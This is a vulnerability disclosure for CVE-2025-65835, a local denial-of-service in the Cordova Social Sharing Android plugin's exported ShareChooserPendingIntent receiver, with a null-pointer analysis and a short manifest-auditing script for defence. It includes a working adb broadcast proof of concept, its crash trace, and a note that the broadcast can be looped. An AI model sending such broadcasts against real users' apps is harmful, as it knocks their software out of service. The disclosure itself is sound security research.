> This vulnerability is now tracked as [CVE-2025-65835](https://nvd.nist.gov/vuln/detail/CVE-2025-65835)

During an engagement against an Android application, I discovered a local denial-of-service (DoS) vulnerability in the latest version (6.0.4) of [Cordova Social Sharing plugin](https://github.com/EddyVerbruggen/SocialSharing-PhoneGap-Plugin). The testing device used was a rooted Android 12 (API 31) emulator.

# Vulnerable Component

The plugin registered an exported broadcast receiver — `nl.xservices.plugins.ShareChooserPendingIntent` — which accepted `android.intent.action.SEND` intents from any application on the same device. It also dereferenced an optional intent extra without a null check, allowing a malicious local application to repeatedly crash any app that includes the vulnerable plugin.

The following snippet is from the `AndroidManifest.xml` of an affected application that is using the vulnerable plugin:

```xml
<activity android:exported="true" android:name="de.niklasmerz.cordova.biometric.BiometricActivity" android:theme="@style/TransparentTheme"/>
<receiver android:enabled="true" android:exported="true" android:name="nl.xservices.plugins.ShareChooserPendingIntent">
    <intent-filter>
        <action android:name="android.intent.action.SEND"/>
    </intent-filter>
</receiver>
```

Initially I tested the exported activity first — `BiometricActivity` — then the receiver. It was only after I had written up both vulnerable components that I discovered that the `BiometricActivity` DoS attack vector is publicly known and tracked as [CVE-2021-43849](https://www.cve.org/CVERecord?id=CVE-2021-43849), which prompted me to look closer into the `ShareChooserPendingIntent` receiver.

## Analysis of ShareChooserPendingIntent

The receiver was registered as follows in the generated manifest:

```xml
<receiver android:enabled="true" android:exported="true" android:name="nl.xservices.plugins.ShareChooserPendingIntent">
    <intent-filter>
        <action android:name="android.intent.action.SEND" />
    </intent-filter>
</receiver>
```

- `android:exported="true"` makes the receiver globally reachable to other apps.
- The `android.intent.action.SEND` intent-filter is generic and commonly used for standard sharing flows.

Ultimately, this means that `ShareChooserPendingIntent` is a `BroadcastReceiver` used as part of the share chooser workflow.

The decompiled smali code of `ShareChooserPendingIntent.smali` shows an `onReceive` implementation that can be reconstructed as:

```java
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;

public class ShareChooserPendingIntent extends BroadcastReceiver {
    public static String chosenComponent = null;

    @Override
    public void onReceive(Context context, Intent intent) {
        if (intent.getExtras() != null) {
            // get() returns null when EXTRA_CHOSEN_COMPONENT is absent,
            // so the chained toString() throws a NullPointerException.
            chosenComponent = intent.getExtras()
                    .get(Intent.EXTRA_CHOSEN_COMPONENT)
                    .toString();
        }
    }
}
```

The `ShareChooserPendingIntent` receiver reads `Intent.EXTRA_CHOSEN_COMPONENT` from the intent extras and immediately calls `.toString()` on the returned value without checking for null. If the intent contains any extras but does not include `EXTRA_CHOSEN_COMPONENT`, the lookup returns null and the call to `.toString()` causes a `NullPointerException`, crashing the app.

Because the receiver is exported and registered for the generic `android.intent.action.SEND` action, any third-party application can send a crafted broadcast that simply omits this extra and reliably triggers the crash, resulting in a local denial-of-service condition.

## Exploitation

An application installed on the same device can craft an explicit broadcast targeting the exported receiver in a victim app that uses `cordova-plugin-x-socialsharing`. This exploit does not require special permissions or user interaction.

Assuming the victim app's package name is `com.example.victim`, the vulnerability can be demonstrated using Android Debug Bridge (ADB) as follows:

```shell
adb shell am broadcast \
    -a android.intent.action.SEND \
    -n com.example.victim/nl.xservices.plugins.ShareChooserPendingIntent \
    --es test "gr3mlin"
```

This command does the following:

- Sends a broadcast with action `android.intent.action.SEND`
- Targets `nl.xservices.plugins.ShareChooserPendingIntent` inside the victim app
- Adds at least one arbitrary extra (key `test`, value `gr3mlin`), ensuring `getExtras()` is non-null
- Does not supply `Intent.EXTRA_CHOSEN_COMPONENT`

On a vulnerable build, this results in a crash similar to:

```
java.lang.RuntimeException: Unable to start receiver nl.xservices.plugins.ShareChooserPendingIntent: java.lang.NullPointerException: Attempt to invoke virtual method 'java.lang.String java.lang.Object.toString()' on a null object reference
    at nl.xservices.plugins.ShareChooserPendingIntent.onReceive(ShareChooserPendingIntent.java:13)
```

A malicious application can invoke the same broadcast programmatically, for example in a loop, to keep the victim application in a crash/restart cycle, effectively denying service to the user.

## Impact

The vulnerability allows a local attacker (another app on the same device) to cause a deterministic denial of service against any Android application embedding `cordova-plugin-x-socialsharing` with the default `ShareChooserPendingIntent` registration.
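
The manifest pattern analysed above (a component that is exported and carries no `android:permission`) can be checked for mechanically when reviewing an app's dependencies. The following Python audit is an added example, not code from the original post or from the plugin; it assumes a manifest already decoded to text XML, and `SAMPLE_MANIFEST` and `InternalReceiver` are constructed for illustration.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace
TAGS = ("activity", "activity-alias", "service", "receiver")

# Constructed sample: the two components from the manifest excerpt above plus a
# hypothetical non-exported receiver (InternalReceiver) for contrast.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.victim">
 <application>
  <activity android:exported="true" android:name="de.niklasmerz.cordova.biometric.BiometricActivity"/>
  <receiver android:enabled="true" android:exported="true"
            android:name="nl.xservices.plugins.ShareChooserPendingIntent">
   <intent-filter><action android:name="android.intent.action.SEND"/></intent-filter>
  </receiver>
  <receiver android:exported="false" android:name="com.example.victim.InternalReceiver">
   <intent-filter><action android:name="com.example.victim.INTERNAL"/></intent-filter>
  </receiver>
 </application>
</manifest>"""


def find_unprotected_exports(manifest_xml):
    """List (tag, name, actions) for components any local app can reach."""
    app = ET.fromstring(manifest_xml).find("application")
    findings = []
    if app is None:
        return findings
    for comp in app:
        if comp.tag not in TAGS or comp.get(A + "enabled") == "false":
            continue
        has_filter = comp.find("intent-filter") is not None
        exported = comp.get(A + "exported")
        if exported is None:
            # Implicit default for apps targeting below API 31: a component
            # with an intent filter is exported.
            exported = "true" if has_filter else "false"
        # A component-level permission overrides the <application> one.
        permission = comp.get(A + "permission") or app.get(A + "permission")
        if exported == "true" and not permission:
            actions = [a.get(A + "name") for a in comp.iter("action")]
            findings.append((comp.tag, comp.get(A + "name"), actions))
    return findings


if __name__ == "__main__":
    for tag, name, actions in find_unprotected_exports(SAMPLE_MANIFEST):
        print(f"{tag:9} {name}  actions={actions or '-'}")
```

A launcher activity will also be listed, which is expected; each finding is a candidate for reviewing how the component handles missing or unexpected extras.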